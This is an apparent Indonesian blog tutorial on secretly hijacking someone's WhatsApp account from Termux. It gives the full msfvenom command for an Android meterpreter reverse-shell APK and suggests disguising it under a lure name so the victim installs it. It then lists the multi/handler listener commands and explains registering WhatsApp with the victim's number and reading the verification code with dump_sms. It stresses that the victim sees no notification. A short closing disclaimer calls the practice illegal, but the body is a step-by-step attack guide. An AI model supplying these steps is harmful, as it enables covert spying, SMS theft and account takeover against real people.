WhatsApp, sebagai salah satu platform pesan instan paling populer di dunia, telah menjadi tulang punggung komunikasi digital global.
Diluncurkan pada tahun 2009, aplikasi ini telah memfasilitasi jutaan orang untuk berkomunikasi, berbagi momen, dan menjalin hubungan, mengatasi batas geografis dan waktu.
WhatsApp membedakan dirinya melalui fitur enkripsi end-to-end, yang menyajikan lapisan keamanan yang tinggi untuk melindungi privasi pengguna.
Dengan memastikan bahwa pesan hanya dapat dibaca oleh pengirim dan penerima, WhatsApp menciptakan ruang komunikasi yang aman dan terpercaya.
Namun siapa sangka bahawa Whatsapp juga bisa di sadap oleh orang lain. Berikut penjelasannya.
Cara Sadap Whatsapp Termux Menggunakan Metasploit
Cara sadap wa ini berbeda dengan whatsapp web yang akan muncul notif di hp korban.
“sadap whatsapp termux berhasil”
“sadap whatsapp berhasil”
Tapi dihp korban tidak akan muncul notif apapun. Jadi tidak akan ketahuan bahwa kita lah pelaku pembajakan tersebut.
Pertama kita harus menginstal tools metasploit diaplikasi termux. Masukan saja perintah:
pkg install metasploit
Apabila gagal, silahkan ikuti panduan lengkap cara install metasploit di termux.
Selanjutnya kita akan membuat aplikasi untuk hack whatsapp atau biasa disebut dengan backdoor dari metasploit.
Aplikasi ini yang akan menjadi perantara antara hp korban dengan tools metasploit yang sedang dijalankan.
Saat backdoor sudah terhubung, kita tinggal memasukan perintah dari metasploit untuk mendapatkan chat whatsapp korban.
Berikut cara sadap wa termux via backdoor metasploit
1. Jalankan Tool Metasploit
Pastikan kalian sudah menginstal metasploit dengan benar.
Apabila sudah, ketik perintah berikut di tampilan awal aplikasi termux:
msfconsole
Tunggu loading sampai metasploit bisa dilaunch.
Tanda apabila kita sudah masuk ke tools awal metasploit
Biasanya diatas kode metasploit terdapat logo (ASCII) yang berubah-ubah. Kadang sapi, tengkorak, tank baja, dll.
Jadi kalau kalian menjalankan metasploit kemudian mendapati logo yang berbeda, jangan dipermasalahkan.
2. Buat Aplikasi Hack Whatsapp
Nama aplikasi nya bisa kalian atur sendiri. Tapi disini saya contohkan dengan nama backdoor.apk (agar mudah menjelaskannya).
Pada tampilan awal metasploit, masukan perintah berikut:
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk
Keterangan :
– Ganti LHOST dengan alamat IP kalian
– Backdoor.apk adalah nama aplikasi, silahkan ganti dengan nama pilihan kalian. (harus diakhiri dengan .apk)
Diatas adalah 1 baris perintah, itu artinya jangan menekan enter sebelum kata terakhir ( /sdcard/namaAplikasi.apk )
Ganti nama aplikasi ini menjadi nama yang membuat orang lain ingin menginstalnya. Contohnya seperti hack pulsa.apk, dll.
Tujuannya adalah agar target mau menginstall aplikasi backdoor tersebut. Karena jika sudah diinstall kita baru bisa melakukan proses selanjutnya.
Apabila proses pembuatan aplikasi berhasil, maka akan muncul dilayar termux notif seperti ini:
saved as: /sdcard/backdoor.apk
Silahkan cek di penyimpanan internal android, pastikan ada file yang bernama backdoor.apk (atau nama yang kalian tulis sebelumnya).
Aplikasi backdoor.apk
apk backdoor di penyimpanan android
Jika proses pembuatan apk gagal, coba periksa dulu perizin aplikasi termux di pengaturan hp. Pastikan ada izin untuk mengakses penyimpanan.
Kemudian ulangi lagi proses pembuatan seperti diatas.
3. Hubungkan aplikasi yang baru dibuat dengan metasploit
Agar aplikasi bisa dihubungkan, syarat utamanya adalah aplikasi tersebut harus diinstall di android target sadap wa.
Jadi silahkan kirimkan file .apk nya ke orang yang ingin kalian sadap atau instal di hp sendiri dulu juga tidak apa untuk percobaan.
Kemudian kembali lagi ke tools metasploit dan masukan perintah berikut:
. use multi/handler
. set payload android/meterpreter/reverse_tcp
. set lhost ip kalian
. set lport 4444
. exploit
Diatas adalah 5 baris perintah. Tekan enter setiap selesai menuliskan 1 baris perintah.
Tunggu proses menghubungkan antara aplikasi dengan metasploit. Apabila sudah terhubung akan muncul “meterpreter >” seperti dibawah ini:
metasploit meterpreter (backdoor sudah terhubung)
Catatan:
Kadang proses menghubungkan ini bisa gagal. Solusinya adalah saat aplikasi sudah terinstal di hp target, cepatlah masukan perintah use multi/handler diatas.
Pastikan juga koneksi internet yang digunakan tidak bermasalah.
Apabila backdoor diinstal di hape sendiri proses meterpreter tidak akan menjadi masalah. Tapi pada saat dipraktekan dilain hape terkadang harus membutuhkan ngrok server.
4. Mendaftar Akun Whatsapp Menggunakan Nomer Target
Pastikan proses menghubungkan apk berhasil (ada meterpreter di layar termux). Selanjutnya silahkan kalian membuat akun whatsapp lagi dengan nomer hp target.
Karena saat apk hack wa sudah terhubung, maka semua notifikasi di hp target bisa kita ketahui. Nah, dengan mendaftar wa menggunakan nomer target, otomatis kita membutuhkan kode verifikasi whatsapp yang dikirimkan ke nomer dia.
Kode verifikasi whatsapp bisa diketahui di langkah no 5, untuk sekarang silahkan kalian selesaikan dulu pendaftaran akun whatsapp sampai proses memasukan kode verifikasi.
5. Mengambil Kode Verifikasi Whatsapp dari Dump SMS
Silahkan kembali lagi ke aplikasi termux yang sedang menampilkan meterpreter. Kemudian masukan kode berikut untuk mendapatkan kode verifikasi whatsapp korban:
dump_sms
Selanjutnya akan muncul nama file berakhiran .txt
file dumb sms metasploit
Kalian copy saja nama filenya lalu pergi ke new season termux.
Cara nya usap layar dari kiri ke kanan dan pilih new season.
new season termux
Selanjutnya masukkan perintah berikut ini:
nano namafile.txt
contoh : nano sms_dump_121374564848.txt
Apabila tidak bisa, coba masukan dulu perintah pkg install nano -y untuk menginstal nano editor.
Nah, saat file .txt terbuka, kalian akan mendapatkan semua pesan dari hp korban. Cari saja sms yang berisi kode verifikasi dari whatsaapp.
Setelah ketemu, copy kode verifikasi nya dan masukan di pendaftaran whatsapp kalian yang terhenti sebelumnya.
Selesai.
Catatan Penting:
Mencari cara untuk menyadap WhatsApp menggunakan Termux atau cara ilegal lainnya tidak hanya berbahaya dan berpotensi melanggar hukum, tetapi juga tidak efektif.
Sebaliknya, gunakanlah fitur-fitur yang disediakan oleh WhatsApp untuk mengakses pesan dengan aman dan legal.
Marilah kita menggunakan teknologi dengan bijak dan bertanggung jawab, menghormati privasi orang lain, dan menghindari aktivitas yang merugikan diri sendiri dan orang lain.